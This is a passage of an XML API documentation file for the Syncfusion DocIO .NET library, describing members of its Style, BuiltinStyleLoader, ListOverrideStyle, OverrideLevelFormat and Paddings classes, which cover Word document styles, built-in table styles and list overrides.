        <member name="M:Syncfusion.DocIO.DLS.Style.NameToBuiltIn(System.String)">
            <summary>
            Converts the style names to BuiltinStyle.
            </summary>
            <param name="styleName">The <b>string</b> represents the name of the style.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.BuiltinStyle"/> member that represents built-in style.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.IsListStyle(Syncfusion.DocIO.DLS.BuiltinStyle)">
            <summary>
            Determines whether is list style the specified built in style.
            </summary>
            <param name="bstyle">The built in style.</param>
            <returns>
            	<c>true</c> if it specifies list style, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.GetBuiltinStyles">
            <summary>
            Loads Builtin styles to dictionary
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.GetBuiltinStyleIds">
            <summary>
            Loads the builtin style ids.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>        
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes. 
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>        
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>        
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.RestoreReference(System.String,System.Int32)">
            <summary>
            Restores object references after deserialization
            <exclude/>
            </summary>
            <param name="name">The <b>string</b> that represents the name.</param>
            <param name="index">The zero-based <b>integer</b> that represents the index.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Style.TableStyleData">
            <summary>
            Represents the table style data (.doc format)
            </summary>
            <remarks>This property is specific for .doc format</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Style.TypeCode">
            <summary>
            Gets or sets the type code of the style.
            <exclude/>
            </summary>
            <remarks>This property is specific for .doc format</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Style.CharacterFormat">
            <summary>
            Gets the character format. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WCharacterFormat"/> object that specifies the character format for the current style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Style.Name">
            <summary>
            Gets or sets the style name.
            </summary>
            <value>The <b>string</b> that represents the style name.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Style.BaseStyle">
            <summary>
            Gets the base style.
            </summary>
            <value>The base style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Style.StyleId">
            <summary>
            Gets or sets the style id.
            </summary>
            <value>The style id.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Style.StyleType">
            <summary>
            Gets the type of the style. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.StyleType"/> member that specifies the type of the style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Style.BuiltInStyleIdentifier">
            <summary>
            Gets the style as built-in Word style.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.BuiltinStyle"/> member that specifies built-in style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Style.NextStyle">
            <summary>
            Gets or sets the next style.
            </summary>
            <value>The next style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Style.LinkStyle">
            <summary>
            Gets or sets the link style name.
            </summary>
            <value>The link style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Style.IsPrimaryStyle">
            <summary>
            Gets or sets a value indicating whether the current instance is primary style.
            </summary>
            <value><c>True</c> if the instance is primary style, otherwise <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Style.IsSemiHidden">
            <summary>
            Gets or sets a value indicating whether this instance is semi hidden.
            </summary>
            <value>
            	if this instance is semi hidden, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Style.UnhideWhenUsed">
            <summary>
            Gets or sets a value indicating whether to unhide when used.
            </summary>
            <value>if unhide when used, set to <c>true</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Style.IsCustom">
            <summary>
            Gets or sets a value indicating whether this instance is custom.
            </summary>
            <value>if this instance is custom, set to <c>true</c>.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader">
            <summary>
            Represents the built-in styles.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.DEF_DOCIO_RESOURCES">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.BuiltinStyleNames">
            <summary>
            Contains the built-in style names.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.BuiltinTableStyleNames">
            <summary>
            Built-in table style names.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyle(Syncfusion.DocIO.DLS.IStyle,Syncfusion.DocIO.DLS.BuiltinStyle)">
            <summary>
            Loads the style.
            </summary>
            <param name="style">The style.</param>
            <param name="bStyle">The b style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyle(Syncfusion.DocIO.DLS.IStyle,Syncfusion.DocIO.DLS.BuiltinTableStyle)">
            <summary>
            Loads the style.
            </summary>
            <param name="style">The style.</param>
            <param name="bStyle">The b style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableNormal(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Normal Table.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableGrid(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Grid.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleLightShading(Syncfusion.DocIO.DLS.IStyle,System.Drawing.Color,System.Drawing.Color,System.Drawing.Color)">
            <summary>
            Loads the table style Light Shading.
            </summary>
            <param name="style">The style.</param>
            <param name="textColor">The text Color.</param>
            <param name="borderColor">The border Color.</param>
            <param name="backColor">The back Color.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleLightList(Syncfusion.DocIO.DLS.IStyle,System.Drawing.Color,System.Drawing.Color)">
            <summary>
            Loads the table style Light List.
            </summary>
            <param name="style">The style.</param>
            <param name="borderColor">The border Color.</param>
            <param name="backColor">The back Color.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleLightGrid(Syncfusion.DocIO.DLS.IStyle,System.Drawing.Color,System.Drawing.Color)">
            <summary>
            Loads the table style Light Grid.
            </summary>
            <param name="style">The style.</param>
            <param name="borderColor">The border Color.</param>
            <param name="backColor">The back Color.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleMediumShading1(Syncfusion.DocIO.DLS.IStyle,System.Drawing.Color,System.Drawing.Color,System.Drawing.Color)">
            <summary>
            Loads the table style Medium Shading 1.
            </summary>
            <param name="style">The style.</param>
            <param name="borderColor">The border Color.</param>
            <param name="firstRowBackColor">The first Row Back Color.</param>
            <param name="backColor">The back Color.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleMediumShading2(Syncfusion.DocIO.DLS.IStyle,System.Drawing.Color)">
            <summary>
            Loads the table style Medium Shading 2.
            </summary>
            <param name="style">The style.</param>
            <param name="backColor">The back Color.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleMediumList1(Syncfusion.DocIO.DLS.IStyle,System.Drawing.Color,System.Drawing.Color)">
            <summary>
            Loads the table style Medium List 1.
            </summary>
            <param name="style">The style.</param>
            <param name="borderColor">The border Color.</param>
            <param name="backColor">The back Color.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleMediumList2(Syncfusion.DocIO.DLS.IStyle,System.Drawing.Color,System.Drawing.Color)">
            <summary>
            Loads the table style Medium List 2.
            </summary>
            <param name="style">The style.</param>
            <param name="borderColor">The border Color.</param>
            <param name="backColor">The back Color.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleMediumGrid1(Syncfusion.DocIO.DLS.IStyle,System.Drawing.Color,System.Drawing.Color,System.Drawing.Color)">
            <summary>
            Loads the table style Medium Grid 1.
            </summary>
            <param name="style">The style.</param>
            <param name="borderColor">The border Color.</param>
            <param name="backColor">The back Color.</param>
            <param name="bandCellColor">The band Cell Color.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleMediumGrid2(Syncfusion.DocIO.DLS.IStyle,System.Drawing.Color,System.Drawing.Color,System.Drawing.Color,System.Drawing.Color,System.Drawing.Color)">
            <summary>
            Loads the table style Medium Grid 2.
            </summary>
            <param name="style">The style.</param>
            <param name="borderColor">The border Color.</param>
            <param name="backColor">The back Color.</param>
            <param name="firstRowColor">The first Row Color.</param>
            <param name="lastColumnColor">The last Column Color.</param>
            <param name="bandCellColor">The band Cell Color.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleMediumGrid3(Syncfusion.DocIO.DLS.IStyle,System.Drawing.Color,System.Drawing.Color,System.Drawing.Color)">
            <summary>
            Loads the table style Medium Grid 3.
            </summary>
            <param name="style">The style.</param>
            <param name="backColor">The back Color.</param>
            <param name="firstRowColor">The first Row Color.</param>
            <param name="bandCellColor">The band Cell Color.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleDarkList(Syncfusion.DocIO.DLS.IStyle,System.Drawing.Color,System.Drawing.Color,System.Drawing.Color)">
            <summary>
            Loads the table style Dark List.
            </summary>
            <param name="style">The style.</param>
            <param name="backColor">The back Color.</param>
            <param name="lastRowColor">The last Row Color.</param>
            <param name="bandCellColor">The band Cell Color.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleColorfulShading(Syncfusion.DocIO.DLS.IStyle,System.Drawing.Color,System.Drawing.Color,System.Drawing.Color,System.Drawing.Color,System.Drawing.Color,System.Drawing.Color)">
            <summary>
            Loads the table style Colorful Shading.
            </summary>
            <param name="style">The style.</param>
            <param name="topBorderColor">The top Border Color.</param>
            <param name="borderColor">The border Color.</param>
            <param name="backColor">The back Color.</param>
            <param name="lastRowColor">The last Row Color.</param>
            <param name="bandColumnColor">The band Column Color.</param>
            <param name="bandRowColor">The band Row Color.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleColorfulList(Syncfusion.DocIO.DLS.IStyle,System.Drawing.Color,System.Drawing.Color,System.Drawing.Color,System.Drawing.Color)">
            <summary>
            Loads the table style Colorful List.
            </summary>
            <param name="style">The style.</param>
            <param name="backColor">The back Color.</param>
            <param name="rowColor">The row Color.</param>
            <param name="bandColumnColor">The band Column Color.</param>
            <param name="bandRowColor">The band Row Color.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleColorfulGrid(Syncfusion.DocIO.DLS.IStyle,System.Drawing.Color,System.Drawing.Color,System.Drawing.Color,System.Drawing.Color)">
            <summary>
            Loads the table style Colorful Grid.
            </summary>
            <param name="style">The style.</param>
            <param name="backColor">The back Color.</param>
            <param name="rowColor">The row Color.</param>
            <param name="columnColor">The column Color.</param>
            <param name="bandColor">The band Color.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTable3Deffects1(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table 3D effects 1.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTable3Deffects2(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table 3D effects 2.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTable3Deffects3(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table 3D effects 3.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableClassic1(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Classic 1.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableClassic2(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Classic 2.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableClassic3(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Classic 3.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableClassic4(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Classic 4.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableColorful1(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Colorful 1.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableColorful2(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Colorful 2.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableColorful3(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Colorful 3.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableColumns1(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Columns 1.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableColumns2(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Columns 2.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableColumns3(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Columns 3.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableColumns4(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Columns 4.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableColumns5(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Columns 5.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableContemporary(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Contemporary.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableElegant(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Elegant.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableGrid1(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Grid 1.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableGrid2(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Grid 2.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableGrid3(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Grid 3.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableGrid4(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Grid 4.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableGrid5(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Grid 5.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableGrid6(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Grid 6.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableGrid7(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Grid 7.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableGrid8(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Grid 8.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableList1(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table List 1.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableList2(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table List 2.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableList3(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table List 3.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableList4(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table List 4.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableList5(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table List 5.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableList6(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table List 6.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableList7(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table List 7.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableList8(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table List 8.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableProfessional(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Professional.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableSimple1(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Simple 1.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableSimple2(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Simple 2.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableSimple3(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Simple 3.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableSubtle1(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Subtle 1.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableSubtle2(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Subtle 2.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableTheme(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Theme.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableWeb1(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Web 1.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableWeb2(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Web 2.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.LoadStyleTableWeb3(Syncfusion.DocIO.DLS.IStyle)">
            <summary>
            Loads the table style Table Web 3.
            </summary>
            <param name="style">The style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.UpdateComplexProperty(Syncfusion.DocIO.DLS.FormatBase,System.Int16,System.Boolean)">
            <summary>
            Updates the complex boolean value.
            </summary>
            <param name="format">The character format.</param>
            <param name="propKey">The property key.</param>
            <param name="val">Boolean value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.UpdateXMLResAndReader">
            <summary>
            Updates the XML resource and reader.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Style.BuiltinStyleLoader.IsListStyle(Syncfusion.DocIO.DLS.BuiltinStyle)">
            <summary>
            Determines whether is list style the specified BuiltinStyle.
            </summary>
            <param name="bstyle">The built in style.</param>
            <returns>
            	 if the list style specified in BuiltinStyle, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideStyle.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.ListOverrideStyle"/> class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideStyle.Clone">
            <summary>
            Clones the <see cref="T:Syncfusion.DocIO.DLS.IStyle"/>, creating duplicate style.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IStyle"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideStyle.CloneImpl">
            <summary>
            Clones itself.
            </summary>
            <returns>Returns cloned object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideStyle.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
            <param name="doc">The doc.</param>
            <param name="nextOwner"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideStyle.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideStyle.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideStyle.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideStyle.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideStyle.Compare(Syncfusion.DocIO.DLS.ListOverrideStyle)">
            <summary>
            Compares the current list override style with another list override style
            </summary>
            <param name="listOverrideStyle">The ListOverrideStyle</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ListOverrideStyle.IsEquivalentListStyle(System.String,System.String,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Compares the source base list with the destination base list style for the override style.
            </summary>
            <param name="sourceListStyleName">Name of the source list style.</param>
            <param name="destListStyleName">Name of the dest list style.</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ListOverrideStyle.StyleType">
            <summary>
            Gets the type of the style.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.StyleType"/>member that specifies the type of the style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ListOverrideStyle.OverrideLevels">
            <summary>
            Gets the override levels.
            </summary>
            <value>The override levels.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ListOverrideStyle.ListID">
            <summary>
            Gets or sets the list identifier.
            </summary>
            <value>The list identifier.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.OverrideLevelFormat">
            <summary>
            Represents the list level override formats.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OverrideLevelFormat.m_startAt">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.OverrideLevelFormat.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.OverrideLevelFormat"/> class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.OverrideLevelFormat.InitXDLSHolder">
            <summary>
            Serialize paragraph and character properties.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.OverrideLevelFormat.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.OverrideLevelFormat.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.OverrideLevelFormat.CloneImpl">
            <summary>
            Clones itself.
            <exclude/>
            </summary>
            <returns>Returns cloned object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.OverrideLevelFormat.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.OverrideLevelFormat.Compare(Syncfusion.DocIO.DLS.OverrideLevelFormat)">
            <summary>
            Compares current list override format with another list override format
            </summary>
            <param name="overrideLevelFormat">The override level format</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.OverrideLevelFormat.OverrideStartAtValue">
            <summary>
            Gets or sets a value indicating whether [override start at value].
            </summary>
            <value>
            	if it override start at value, set to <c>true</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.OverrideLevelFormat.OverrideFormatting">
            <summary>
            Gets or sets a value indicating whether [override formatting].
            </summary>
            <value>if it override formatting, set to <c>true</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.OverrideLevelFormat.StartAt">
            <summary>
            Gets or sets the start at.
            </summary>
            <value>The start at.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.OverrideLevelFormat.OverrideListLevel">
            <summary>
            Gets the override list level.
            </summary>
            <value>The override list level.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Paddings">
            <summary>
            Represents the cell paddings.
            </summary>
            <seealso cref="T:Syncfusion.DocIO.DLS.CellFormat"/>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Paddings.LeftKey">
            <summary>
            Specifies the constant value for left key.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Paddings.TopKey">
            <summary>
            Specifies the constant value for top key.
            </summary>
        </member>
